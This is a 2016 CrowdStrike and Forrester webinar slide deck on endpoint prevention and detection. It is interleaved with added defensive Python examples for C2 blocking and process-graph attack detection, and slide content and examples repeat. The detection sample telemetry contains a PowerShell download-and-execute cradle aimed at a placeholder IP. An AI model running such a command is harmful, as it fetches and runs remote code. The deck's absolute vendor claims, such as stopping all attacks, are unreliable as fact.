2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
YOU CAN’T STOP THE BREACH WITHOUT
PREVENTION AND DETECTION
CHRIS SHERMAN, SENIOR ANALYST, FORRESTER
ROD MURCHISON, VP, PRODUCT MANAGEMENT, CROWDSTRIKE
Mastering the Endpoint: Leverage
Forrester’s Targeted Attack Hierarchy Of
Needs
Chris Sherman, Senior Analyst
October 20th, 2016
© 2016 Forrester Research, Inc. Reproduction Prohibited 3
The 90’s called, they want their endpoint security strategy back
Despite…
[chart: share of organizations relying on each endpoint control. Labels recovered from the slide: Anti-Virus, Application patching, Application control, Endpoint Visibility & Control; values shown: 80%, 63%, 48%, 55%, 53%. The extracted text does not preserve which value belongs to which bar.]
42% of breaches involved a software exploit over the past year
a 19% increase in costs associated with cyberattacks Y-Y
Base: 671 IT and IT security practitioners. Source: Ponemon 2013 State of the Endpoint Survey
Base: 881 IT Security Decision Makers. Source: Forrester BT Security Survey, Q3 2015
…Many organizations still rely heavily on antivirus. A New Approach Is Needed!
Organizations Must Refocus Their
Endpoint Security Strategies
The Targeted-Attack Hierarchy Of Needs
Targeted-Attack Hierarchy Of Needs
Need No. 1: An Actual Security
Strategy
Expense in Depth
Return on Expense in Depth?
Components of a sound strategy
› Adopt the principles of the Zero Trust model
› Data-driven security, not alert-driven security
› Data-driven security is really business-driven security, which is supported by executives
Targeted-Attack Hierarchy Of Needs
Need No. 2: A Dedication To
Recruiting And Retaining Staff
Double down on higher education
› There is intense competition between the emerging cyber programs
› Make them more competitive: join advisory boards and drive curriculum that produces capable graduates
Targeted-Attack Hierarchy Of Needs
Need No. 3: A Focus On The
Fundamentals
A Focus On The Fundamentals
Targeted-Attack Hierarchy Of Needs
Need No. 4: An Integrated
Portfolio That Enables
Orchestration
Friction?
› “Create friction for the
attacker. Slow them down
and make their job more
difficult.”
› What about all the friction
we create for ourselves?
› Most orgs don’t have the
resources to automate
their InfoSec processes.
What can you do?
› Invest in software
development staff
› Prioritize vendors that
integrate and automate
between the endpoint and
network layers
› Pay attention to vendors
who see the need and are
developing solutions.
Targeted-Attack Hierarchy Of Needs
Need No. 5: Prevention
Prevention is shifting
› Traditional approaches to
prevention will continue
› If you can prevent an
action, why not?
› Prevention with threat
intelligence
• Command and Control
indicators should be used to
prevent communications
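The Command and Control bullet above is the one concrete prevention control on this slide, so here is a worked version of it. This is an added example, not code from the deck or from CrowdStrike: a small policy engine that loads C2 indicators (exact IPs, CIDR ranges and domains, each with an expiry) from a threat-intelligence feed and decides, per outbound connection event, whether to block it. The indicator and event formats, the host names and the sample data (RFC 5737 documentation addresses and reserved `.example` names) are all constructed for illustration.

```python
# Added example: outbound-connection blocking against C2 indicators. Not from
# the deck or from CrowdStrike; indicator/event formats and the sample data
# below are constructed for illustration.
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional


@dataclass(frozen=True)
class Indicator:
    kind: str           # "ip", "cidr" or "domain"
    value: str
    expires: datetime   # C2 infrastructure is recycled; indicators must age out


@dataclass(frozen=True)
class Connection:
    host: str
    process: str
    dst_ip: str
    dst_name: Optional[str]   # name the process resolved, if the sensor saw one
    ts: datetime


class C2Blocklist:
    """Prevention policy: match connections against indicators that are still live."""

    def __init__(self, indicators: list[Indicator]) -> None:
        self.ips = {}       # exact IP -> Indicator
        self.nets = []      # (ip_network, Indicator) for CIDR ranges
        self.domains = {}   # normalised domain -> Indicator
        for ind in indicators:
            if ind.kind == "ip":
                self.ips[ind.value] = ind
            elif ind.kind == "cidr":
                self.nets.append((ipaddress.ip_network(ind.value, strict=False), ind))
            elif ind.kind == "domain":
                self.domains[ind.value.lower().rstrip(".")] = ind
            else:
                raise ValueError(f"unknown indicator kind: {ind.kind}")

    @staticmethod
    def _live(ind: Optional[Indicator], ts: datetime) -> Optional[Indicator]:
        # An expired indicator must not block: the address may now belong to a
        # legitimate tenant, and stale blocks are how prevention loses trust.
        return ind if ind is not None and ind.expires > ts else None

    def match(self, conn: Connection) -> Optional[Indicator]:
        """Return the first live indicator the connection matches, else None."""
        hit = self._live(self.ips.get(conn.dst_ip), conn.ts)
        if hit:
            return hit
        addr = ipaddress.ip_address(conn.dst_ip)
        for net, ind in self.nets:
            if addr in net and self._live(ind, conn.ts):
                return ind
        if conn.dst_name:
            # A domain indicator covers the name and every subdomain of it:
            # "evil-c2.example" blocks "cdn.evil-c2.example" but must not block
            # "notevil-c2.example", so compare whole labels, never substrings.
            labels = conn.dst_name.lower().rstrip(".").split(".")
            for i in range(len(labels)):
                hit = self._live(self.domains.get(".".join(labels[i:])), conn.ts)
                if hit:
                    return hit
        return None

    def decide(self, conn: Connection) -> dict:
        ind = self.match(conn)
        return {"host": conn.host, "process": conn.process,
                "action": "block" if ind else "allow",
                "indicator": ind.value if ind else None}


def evaluate(indicators: list[Indicator], connections: list[Connection]) -> list[dict]:
    """Apply the blocklist to a batch of connection events."""
    policy = C2Blocklist(indicators)
    return [policy.decide(c) for c in connections]


# Constructed sample data: RFC 5737 documentation addresses, reserved .example names.
T0 = datetime(2016, 10, 20, 12, 0, tzinfo=timezone.utc)
SAMPLE_INDICATORS = [
    Indicator("ip", "203.0.113.45", T0 + timedelta(days=30)),
    Indicator("cidr", "198.51.100.0/24", T0 + timedelta(days=30)),
    Indicator("domain", "evil-c2.example", T0 + timedelta(days=30)),
    Indicator("domain", "old-c2.example", T0 - timedelta(days=1)),   # already expired
]
SAMPLE_CONNECTIONS = [
    Connection("ws-01", "svchost.exe", "203.0.113.45", None, T0),                    # exact IP
    Connection("ws-02", "rundll32.exe", "198.51.100.77", None, T0),                  # inside CIDR
    Connection("ws-03", "powershell.exe", "192.0.2.10", "cdn.evil-c2.example", T0),  # subdomain
    Connection("ws-04", "chrome.exe", "192.0.2.11", "notevil-c2.example", T0),       # lookalike: allow
    Connection("ws-05", "outlook.exe", "192.0.2.12", "old-c2.example", T0),          # expired: allow
]
```

Calling `evaluate(SAMPLE_INDICATORS, SAMPLE_CONNECTIONS)` blocks the first three connections and allows the last two. Two details matter in practice and both are exercised by the sample: domain indicators are matched label by label so a lookalike name does not trip the block, and expired indicators are ignored, because C2 infrastructure is recycled and a stale block on a now-legitimate address is how a prevention control loses the trust of the people it protects.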
Prevention begins and ends with attack surface
reduction
Photo credit: Jan Stromme, Bloomberg Business
Targeted-Attack Hierarchy Of Needs
Need No. 6: Detection & Response
Detection
› Detection is the only option
when dealing with higher tier
adversaries
› No single control is your
breach detection system
› Your aggregate controls and
your people are your breach
detection system
Response
› Once you have
identified malicious
activity, how do you
respond?
› Is your remediation a
reimage?
› Time to containment
and remediation will
never improve without
automated response
To be successful, an endpoint
security strategy must balance
prevention with detection
Endpoint Security Requires A Balanced Approach
› Prevention
  • Addresses attack surface
  • Limits time spent on detection/response
  • Doesn’t require frequent updates
› Detection
  • Endpoint visibility and integration
  • Catches what gets through
  • Threat intelligence required
› Control / Remediation
  • Automated/assisted remediation reduces friction
  • Ensures policy compliance
  • Operationalizes threat intelligence
Recommendations
› Choose prevention technologies based on your risk appetite and
impact to user experience.
› Look to expand your detection capabilities beyond malicious
process identification and IOC identification
› Reduce your attack surface through a balance of prevention,
detection, and remediation proficiency.
THE YIN & YANG OF ENDPOINT PROTECTION
§ You need to see Prevention & Detection in a holistic way
§ There needs to be a virtuous approach - one feeds the other and vice-versa
§ You need to have a vision, from the outset, to build this; you can’t just make this up as you go along
[diagram: Prevention and Detection drawn as the two halves of a yin-yang]
Cloud Delivered Endpoint Protection
[diagram: three components - Next-Gen Antivirus, Endpoint Detection and Response, Managed Hunting]
CrowdStrike is the only security technology provider to unify next-gen AV and EDR into a single agent, backed by 24/7 proactive threat hunting – all delivered via the cloud
PREVENTION BENEFITS
Prevents all types of attacks
Benefits / business value:
§ Protect against Known/Unknown Malware
§ Protect Against Zero-Day Attacks
§ Eliminate Ransomware
§ No Signature Updates
§ No User Impact—Less than 1% CPU overhead
§ Reduce re-imaging time and costs
Prevention techniques (the four blocks on the slide):
§ Machine Learning
§ IOA Behavioral Blocking
§ Block Known Bad
§ Exploit Mitigation
CLASSIC EDR JUSTIFICATION:
THERE IS NO SUCH THING AS 100% PREVENTION
§ Attacks will always get through
§ Even with 99% efficacy you still need something to deal with the 1%
§ So, you need EDR to deal with this and solve the ‘silent failure’ problem
[chart: 99% stopped, 1% missed]
WHAT 99% CAN MEAN…
[chart: chance of at least one success for the adversary against number of attempts; the curve rises from 1% at a single attempt to more than 99% at 500 attempts]
Bottom line: change the binary 500 times and, with 99% detection efficacy, the adversary is more than 99% likely to get at least one file through.
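The curve on this slide is a plain binomial calculation. The derivation below is added here, is not part of the deck, and assumes that each attempt is independent and has the same chance of slipping past prevention, i.e. 99% efficacy means a per-attempt miss probability of $p = 0.01$.

$$
P(\text{at least one success in } n \text{ attempts}) = 1 - (1-p)^{n}, \qquad p = 1 - 0.99 = 0.01
$$

$$
n = 500:\quad 1 - 0.99^{500} = 1 - e^{500 \ln 0.99} \approx 1 - e^{-5.03} \approx 0.993 \;>\; 99\%
$$

Solving the same expression for $n$ shows how little effort the adversary actually needs:

$$
n_{50\%} = \frac{\ln 0.5}{\ln 0.99} \approx 69, \qquad
n_{90\%} = \frac{\ln 0.1}{\ln 0.99} \approx 230, \qquad
\mathbb{E}[\text{successes}] = n\,p = 5 \text{ at } n = 500
$$

About 69 recompiled variants give the attacker even odds, 230 give 90%, and after 500 attempts the expected number of files through is five, not just one. That is the quantitative case for putting detection and response behind prevention rather than treating 99% as good enough.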
ENDPOINT DETECTION AND RESPONSE
Benefits / business value:
§ Prevent against silent failure
§ DVR for the endpoint
§ 5 Second Enterprise Search
§ No Hardware or Storage Costs
§ Full Spectrum Visibility
§ Reduced Time to Remediation
MANAGED HUNTING
FINDING THE ADVERSARY So You Don’t Have To
Breach prevention services: a team of hunters working for you 24 x 7
Benefits / business value:
§ Force Multiplier
§ Community Immunity
§ Reduce Alert Fatigue: Focus on What Matters!
§ Stop the “Mega” Breach
SO YOU’VE GOT DETECTION AND PREVENTION,
WHY ARE YOU STILL DISAPPOINTED?
§ You can’t just slam two things together - detection & prevention
§ You can’t just tick off a checklist of features
§ This is tough stuff; you need to be thoughtful and considered in how you architect a prevention and detection solution
§ You can’t see prevention and EDR as two separate things
SO, WHERE DOES PREVENTION END & DETECTION START?
[diagram: the Prevention / Detection yin-yang]
OVERVIEW OF WHAT’S REQUIRED TO PROPERLY UNIFY NEXT-GEN AV AND EDR
1. Complete and accurate visibility
2. Analysis capacity
3. Ability to turn data into information and insight
COMPLETE AND ACCURATE VISIBILITY
§ Data: need lots of it
§ Scalability: in the cloud
§ Power: storage, throughput and compute power
§ Integrity: high fidelity
§ Usefulness: insightful
§ Flexible capture: distributed/mobile/BYOD, on or off the network
ANALYSIS CAPACITY
§ Organize and analyze big data
§ You need to analyze this at massive scale
§ You need to ‘glue’ all this data together
§ That’s why a ‘Graph’ is the answer
ABILITY TO TURN DATA INTO INFORMATION AND INSIGHT
§ Piecing data together and establishing the relationships between the pieces drives ‘context’ - the more data you have, the richer the context
§ Understanding context lets you understand behavior, and that allows you to get to IOA
[diagram: Threat Graph feeding Indicators of Attack and EDR]
WHICH IN TURN MAKES BOTH PREVENTION AND EDR BETTER
§ IOAs = better ‘prevention’
§ IOAs = defeat attackers who are ‘living off the land’
§ Traditional malware-centric security approaches are inadequate against them
§ IOAs = better EDR, and better EDR = better IOAs
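The three slides above (analysis capacity: “a Graph is the answer”; context lets you understand behavior and get to IOA; IOAs defeat attackers living off the land) describe one pipeline, so one worked example serves all of them. It is added here and is neither the deck’s nor CrowdStrike’s Threat Graph code: constructed telemetry for a single host is linked into a process graph, and a behavioural IOA is evaluated over the relationships in that graph rather than over any single file. The event schema, the detection rule, the process lists and the sample command lines are assumptions made for illustration.

```python
# Added example: process graph + behavioural IOA over constructed endpoint
# telemetry. Not from the deck and not CrowdStrike's Threat Graph; the event
# schema, the rule and the sample events are assumptions for illustration.
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Process:
    pid: int
    ppid: Optional[int]
    image: str                  # executable file name, lower-cased
    cmdline: str
    signed: bool                # binary carries a valid vendor signature
    children: list = field(default_factory=list)
    connections: list = field(default_factory=list)   # (dst_ip, dst_port)


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Signed OS binaries an intruder can live off the land with; none is malware.
LOLBINS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def build_process_graph(events: list[dict]) -> dict[int, Process]:
    """Link ProcessStart and NetworkConnect events into a tree keyed by pid."""
    procs: dict[int, Process] = {}
    for ev in events:
        if ev["type"] == "ProcessStart":
            procs[ev["pid"]] = Process(ev["pid"], ev.get("ppid"), ev["image"].lower(),
                                       ev["cmdline"], ev["signed"])
    for p in procs.values():                          # parent -> child edges
        parent = procs.get(p.ppid)
        if parent is not None:
            parent.children.append(p)
    for ev in events:                                 # process -> network edges
        if ev["type"] == "NetworkConnect" and ev["pid"] in procs:
            procs[ev["pid"]].connections.append((ev["dst_ip"], ev["dst_port"]))
    return procs


def ancestors(procs: dict[int, Process], p: Process) -> list[Process]:
    """Parent, grandparent, ... of p, nearest first (p itself excluded)."""
    chain: list[Process] = []
    cur = procs.get(p.ppid)
    while cur is not None:
        chain.append(cur)
        cur = procs.get(cur.ppid)
    return chain


def unsigned_binaries(procs: dict[int, Process]) -> list[str]:
    """All a file-centric control (AV signature, hash IOC) has to go on."""
    return sorted({p.image for p in procs.values() if not p.signed})


def ioa_office_to_lolbin_with_network(procs: dict[int, Process]) -> list[dict]:
    """IOA: a living-off-the-land binary descended (at any depth) from an Office
    application makes an outbound connection. Each event alone is normal; the
    relationship between them is the signal."""
    hits = []
    for p in procs.values():
        if p.image not in LOLBINS or not p.connections:
            continue
        chain = ancestors(procs, p)
        if not any(a.image in OFFICE_APPS for a in chain):
            continue
        hits.append({"pid": p.pid,
                     "chain": [a.image for a in reversed(chain)] + [p.image],
                     "cmdline": p.cmdline,
                     "connections": list(p.connections)})
    return sorted(hits, key=lambda h: h["pid"])


# Constructed telemetry for one host: every binary is signed and nothing
# malicious is written to disk. 203.0.113.45 is an RFC 5737 documentation address.
CRADLE = ("powershell.exe -nop -w hidden -c "
          "\"IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.45/a')\"")
SAMPLE_EVENTS = [
    {"type": "ProcessStart", "pid": 100, "ppid": None, "image": "explorer.exe",
     "cmdline": "explorer.exe", "signed": True},
    {"type": "ProcessStart", "pid": 200, "ppid": 100, "image": "WINWORD.EXE",
     "cmdline": 'WINWORD.EXE "C:\\Users\\u\\Downloads\\invoice.docm"', "signed": True},
    {"type": "ProcessStart", "pid": 300, "ppid": 200, "image": "cmd.exe",
     "cmdline": "cmd.exe /c " + CRADLE, "signed": True},
    {"type": "ProcessStart", "pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": CRADLE, "signed": True},
    {"type": "NetworkConnect", "pid": 400, "dst_ip": "203.0.113.45", "dst_port": 80},
    # Same binary, also talks to the network, but launched from the desktop for an
    # admin script: no Office ancestor, so the IOA stays quiet.
    {"type": "ProcessStart", "pid": 500, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\ops\\inventory.ps1", "signed": True},
    {"type": "NetworkConnect", "pid": 500, "dst_ip": "192.0.2.20", "dst_port": 443},
]
```

Running `ioa_office_to_lolbin_with_network(build_process_graph(SAMPLE_EVENTS))` returns a single hit whose chain is explorer.exe to winword.exe to cmd.exe to powershell.exe with the outbound connection attached, while `unsigned_binaries` on the same graph returns an empty list: every binary is signed and nothing malicious touches disk, so a hash or signature control has nothing to act on. The same PowerShell binary launched from the desktop for an admin script is not flagged, because the graph shows it has no Office ancestor. That is the slide’s point in code: the relationship between events, not any one file, is what becomes an IOA once the data is glued together.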
SUMMARY
§ You need to see Prevention & Detection in a holistic way
§ There needs to be a virtuous approach - one feeds the
other and vice-versa
§ You need to have a vision, from the outset to build this,
you can’t just make this up as you go along
NEW FORRESTER WAVE
The Forrester Wave™: Endpoint Security, Q4 2016
The 15 Providers That Matter Most And How They Stack Up
§ CrowdStrike will be sending a copy to ALL webcast registrants
Q&A
crowdcasts@crowdstrike.com

  • 5. © 2016 Forrester Research, Inc. Reproduction Prohibited 5 The Targeted-Attack Hierarchy Of Needs
  • 6. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 1: An Actual Security Strategy
  • 7. © 2016 Forrester Research, Inc. Reproduction Prohibited 7 Expense in Depth
  • 8. © 2016 Forrester Research, Inc. Reproduction Prohibited 8 Return on Expense in Depth?
  • 9. © 2016 Forrester Research, Inc. Reproduction Prohibited 9 Components of a sound strategy › Adopt principles of the Zero Trust model › Data-driven security, not alert-driven security › Data-driven security is really business-driven security, which is supported by executives
  • 10. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 2: A Dedication To Recruiting And Retaining Staff
  • 11. © 2016 Forrester Research, Inc. Reproduction Prohibited 11 Double down on higher education › There is intense competition between the emerging cyber programs › Make them more competitive; join an advisory board and drive curriculum that produces capable graduates
  • 12. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 3: A Focus On The Fundamentals
  • 13. © 2016 Forrester Research, Inc. Reproduction Prohibited 13 A Focus On The Fundamentals
  • 14. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 4: An Integrated Portfolio That Enables Orchestration
  • 15. © 2016 Forrester Research, Inc. Reproduction Prohibited 15 Friction? › “Create friction for the attacker. Slow them down and make their job more difficult.” › What about all the friction we create for ourselves? › Most orgs don’t have the resources to automate their InfoSec processes.
  • 16. © 2016 Forrester Research, Inc. Reproduction Prohibited 16 What can you do? › Invest in software development staff › Prioritize vendors that integrate and automate between the endpoint and network layers › Pay attention to vendors who see the need and are developing solutions.
  • 17. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 5: Prevention
  • 18. © 2016 Forrester Research, Inc. Reproduction Prohibited 18 Prevention is shifting › Traditional approaches to prevention will continue › If you can prevent an action, why not? › Prevention with threat intelligence • Command and Control indicators should be used to prevent communications
  • 19. © 2016 Forrester Research, Inc. Reproduction Prohibited 19 Prevention begins and ends with attack surface reduction Photo credit: Jan Stromme, Bloomberg Business
  • 20. © 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 6: Detection & Response
  • 21. © 2016 Forrester Research, Inc. Reproduction Prohibited 21 Detection › Detection is the only option when dealing with higher tier adversaries › No single control is your breach detection system › Your aggregate controls and your people are your breach detection system
  • 22. © 2016 Forrester Research, Inc. Reproduction Prohibited 22 Response › Once you have identified malicious activity, how do you respond? › Is your remediation a reimage? › Time to containment and remediation will never improve without automated response
  • 23. © 2016 Forrester Research, Inc. Reproduction Prohibited 23 To be successful, an endpoint security strategy must balance prevention with detection
  • 24. © 2016 Forrester Research, Inc. Reproduction Prohibited 24 Prevention Detection Control / Remediation Endpoint Security Requires A Balanced Approach
  • 25. © 2016 Forrester Research, Inc. Reproduction Prohibited 25 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates Endpoint Security Requires A Balanced Approach
  • 26. © 2016 Forrester Research, Inc. Reproduction Prohibited 26 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates • Endpoint visibility and integration • Catches what gets through • Threat intelligence required Endpoint Security Requires A Balanced Approach
  • 27. © 2016 Forrester Research, Inc. Reproduction Prohibited 27 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates • Endpoint visibility and integration • Catches what gets through • Threat intelligence required • Automated/assisted remediation reduces friction • Ensures policy compliance • Operationalizes threat intelligence Endpoint Security Requires A Balanced Approach
  • 28. © 2016 Forrester Research, Inc. Reproduction Prohibited 28 Recommendations › Choose prevention technologies based on your risk appetite and impact to user experience. › Look to expand your detection capabilities beyond malicious process identification and IOC identification › Reduce your attack surface through a balance of prevention, detection, and remediation proficiency.
  • 29. THE YIN & YANG OF ENDPOINT PROTECTION § You need to see Prevention & Detection in a holistic way § There needs to be a virtuous approach - one feeds the other and vice versa § You need to have a vision from the outset to build this; you can’t just make this up as you go along (figure: PREVENTION / DETECTION)
  • 30. Cloud Delivered Endpoint Protection MANAGED HUNTING ENDPOINT DETECTION AND RESPONSE NEXT-GEN ANTIVIRUS CrowdStrike is the only security technology provider to unify next-gen AV and EDR into a single agent, backed by 24/7 proactive threat hunting – all delivered via the cloud 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 31. PREVENTION BENEFITS PREVENTS ALL TYPES OF ATTACKS Protect against Known/Unknown Malware Protect Against Zero-Day Attacks Eliminate Ransomware No Signature Updates No User Impact—Less than 1% CPU overhead Reduce re-imaging time and costs BUSINESS VALUE Machine Learning IOA Behavioral Blocking Block Known Bad Exploit Mitigation 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 32. CLASSIC EDR JUSTIFICATION: THERE IS NO SUCH THING AS 100% PREVENTION § Attacks will always get through § Even with 99% efficacy you still need something to deal with the 1% § So, you need EDR to deal with this and solve the ‘silent failure’ problem 1% missed 99% stopped 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 33. WHAT 99% CAN MEAN… 33 (chart: chance of at least one success for adversary vs. number of attempts; labels: 1%, >99%, 500) Bottom line: change the binary 500 times and with 99% detection efficacy you will get one file through
  • 34. PREVENT AGAINST SILENT FAILURE DVR FOR ENDPOINT BUSINESS VALUE 5 Second Enterprise Search No Hardware or Storage Costs Full Spectrum Visibility Reduced Time to Remediation BENEFITS 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. DETECTION AND RESPONSE
  • 35. FINDING THE ADVERSARY So You Don’t Have To BREACH PREVENTION SERVICES Team of Hunters Working for You 24 x 7 BUSINESS VALUE Force Multiplier Community Immunity BENEFITS Reduce Alert Fatigue: Focus on What Matters! Stop the “Mega” Breach 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. MANAGED HUNTING
  • 36. SO YOU GOT DETECTION AND PREVENTION, WHY ARE YOU STILL DISAPPOINTED? § You can’t just slam two things together - detection & prevention § You can’t just tick a list of features where you check-off features § This is tough stuff, you need to be thoughtful and considered in how you architect a prevention and detection solution § You can’t see prevention and EDR as two separate things 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 37. SO, WHERE DOES PREVENTION END & DETECTION START? 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. (figure: PREVENTION / DETECTION)
  • 38. OVERVIEW OF WHAT’S REQUIRED TO PROPERLY UNIFY NEXT-GEN AV AND EDR 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. Complete and accurate visibility Analysis capacity 1 2 3 Ability to turn data into information and insight
  • 39. COMPLETE AND ACCURATE VISIBILITY § Data: Need lots of it § Scalability: In the Cloud § Power: Storage, throughput and compute power § Integrity: High fidelity § Usefulness: Insightful § Flexible Capture: distributed/mobile/BYOD and on/off network 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 40. ANALYSIS CAPACITY § Organize and analyze big data § You need to analyze this at massive scale § You need to ‘glue’ all this data together § That’s why a ‘Graph’ is the answer 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 41. ABILITY TO TURN DATA INTO INFORMATION AND INSIGHT § Piecing data together and establishing the relationships between them drives ‘Context’ - the more data you have, the ‘richer the context’ § Understanding context lets you understand behavior, and that allows you to get to IOA (figure: THREAT GRAPH, Indicators of Attack, EDR) 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 42. WHICH IN TURN MAKES BOTH PREVENTION AND EDR BETTER § IOAs = better ‘prevention’ § IOAs = defeat attackers who are ‘living off the land’ § Traditional malware and security approaches are inadequate § IOAs = better EDR and better EDR = better IOAs
  • 43. SUMMARY § You need to see Prevention & Detection in a holistic way § There needs to be a virtuous approach - one feeds the other and vice versa § You need to have a vision from the outset to build this; you can’t just make this up as you go along
  • 44. NEW FORRESTER WAVE The Forrester Wave™: Endpoint Security, Q4 2016 The 15 Providers That Matter Most And How They Stack Up § CrowdStrike will be sending a copy to ALL webcast registrants 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 45. Q&A 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. crowdcasts@crowdstrike.com
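The "99% stopped, 1% missed" chart on slide 33 is the one quantitative claim in the deck, so here is the arithmetic behind it, as an added example that is not part of the original presentation and not CrowdStrike's or Forrester's code. It assumes each attempt is independent and stopped with the same probability (the chart's implicit model), and generalizes beyond the slide's single point: it also answers how many attempts an adversary needs to reach a given chance of success, and what per-attempt efficacy a control would need to hold a persistent adversary below a chosen risk level. The function names are the example's own.

```python
import math
from typing import List, Optional, Tuple


def adversary_success_probability(efficacy: float, attempts: int) -> float:
    """Chance that at least one of `attempts` independent attempts gets past a
    control that stops each individual attempt with probability `efficacy`.

    All attempts are stopped with probability efficacy ** attempts, so the
    complement is the adversary's chance of at least one success.
    """
    if not 0.0 <= efficacy <= 1.0:
        raise ValueError("efficacy must be in [0, 1]")
    if attempts < 0:
        raise ValueError("attempts must be non-negative")
    return 1.0 - efficacy ** attempts


def attempts_for_success_probability(efficacy: float, target: float) -> Optional[int]:
    """Smallest number of attempts at which the adversary's chance of at least
    one success reaches `target`; None when efficacy is 1.0 (never beaten by volume)."""
    if not 0.0 < target < 1.0:
        raise ValueError("target must be strictly between 0 and 1")
    if efficacy >= 1.0:
        return None
    if efficacy <= 0.0:
        return 1  # nothing is stopped, so the first attempt succeeds
    # Solve 1 - efficacy**n >= target for the smallest integer n.
    return math.ceil(math.log(1.0 - target) / math.log(efficacy))


def required_efficacy(attempts: int, max_success: float) -> float:
    """Per-attempt efficacy a control needs so that an adversary making
    `attempts` tries has at most `max_success` chance of getting through."""
    if attempts < 1:
        raise ValueError("attempts must be at least 1")
    if not 0.0 < max_success < 1.0:
        raise ValueError("max_success must be strictly between 0 and 1")
    # (1 - max_success) = efficacy ** attempts, solved for efficacy.
    return (1.0 - max_success) ** (1.0 / attempts)


def success_curve(efficacy: float, max_attempts: int, step: int = 50) -> List[Tuple[int, float]]:
    """(attempts, probability) points of the kind plotted on slide 33."""
    return [(n, adversary_success_probability(efficacy, n))
            for n in range(step, max_attempts + 1, step)]


if __name__ == "__main__":
    for n, p in success_curve(0.99, 500):
        print(f"{n:4d} attempts -> {p:.2%} chance of at least one success")
    print("attempts to reach 50%:", attempts_for_success_probability(0.99, 0.5))
    print("attempts to reach 99%:", attempts_for_success_probability(0.99, 0.99))
    print("efficacy needed to hold 500 attempts to a coin flip:",
          f"{required_efficacy(500, 0.5):.4%}")
```

With 99% per-attempt efficacy the adversary passes 50% after 69 attempts and 99% after 459, which is the slide's point; the inverse is the one defenders should keep in mind: holding a 500-attempt adversary to a 50% chance needs about 99.86% per-attempt prevention, which is why the deck pairs prevention with detection rather than chasing the last fraction of a percent.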
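Slides 38 to 42 argue that raw endpoint events become useful only once the relationships between them are captured in a graph, and that this context is what an indicator of attack (IOA) is built from. The following is an added example of that idea, written for this page; it is not CrowdStrike's Threat Graph or any vendor's rule set. The telemetry is constructed, the process and image names are illustrative, and the behavioural rule (a document handler spawning a script host that then connects out) is a hypothetical rule chosen because none of its individual events is suspicious on its own.

```python
from collections import defaultdict
from typing import Dict, List

# Constructed endpoint telemetry for one host (illustrative, not real data).
# Two PowerShell processes start and both talk to the network; only their
# ancestry separates routine admin use from a document-spawned script host.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1,   "image": "explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100, "image": "winword.exe"},
    {"type": "process", "pid": 300, "ppid": 100, "image": "powershell.exe"},
    {"type": "process", "pid": 400, "ppid": 200, "image": "powershell.exe"},
    {"type": "network", "pid": 300, "dest": "198.51.100.5:443"},
    {"type": "network", "pid": 400, "dest": "203.0.113.10:443"},
]

# Hypothetical behavioural rule (not a vendor's rule set): a document handler
# spawns a script host, and that script host opens a network connection.
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe"}


class ProcessGraph:
    """Processes as nodes; parent->child and process->destination as edges."""

    def __init__(self) -> None:
        self.image: Dict[int, str] = {}
        self.parent: Dict[int, int] = {}
        self.connections: Dict[int, List[str]] = defaultdict(list)

    def add_event(self, event: dict) -> None:
        if event["type"] == "process":
            self.image[event["pid"]] = event["image"]
            self.parent[event["pid"]] = event["ppid"]
        elif event["type"] == "network":
            self.connections[event["pid"]].append(event["dest"])
        else:
            raise ValueError(f"unknown event type: {event['type']}")

    def ancestry(self, pid: int) -> List[str]:
        """Image names from `pid` up to the first process we have no record of."""
        chain: List[str] = []
        seen = set()
        while pid in self.image and pid not in seen:  # `seen` guards against pid reuse loops
            seen.add(pid)
            chain.append(self.image[pid])
            pid = self.parent[pid]
        return chain


def build_graph(events) -> ProcessGraph:
    graph = ProcessGraph()
    for event in events:
        graph.add_event(event)
    return graph


def find_ioa(graph: ProcessGraph) -> List[dict]:
    """Flag script hosts whose parent is a document handler and which connected
    out. Each event alone is ordinary; the chain of relationships is the signal."""
    findings = []
    for pid, image in graph.image.items():
        if image not in SCRIPT_HOSTS:
            continue
        parent_image = graph.image.get(graph.parent.get(pid))
        if parent_image not in DOCUMENT_HANDLERS:
            continue
        destinations = graph.connections.get(pid, [])
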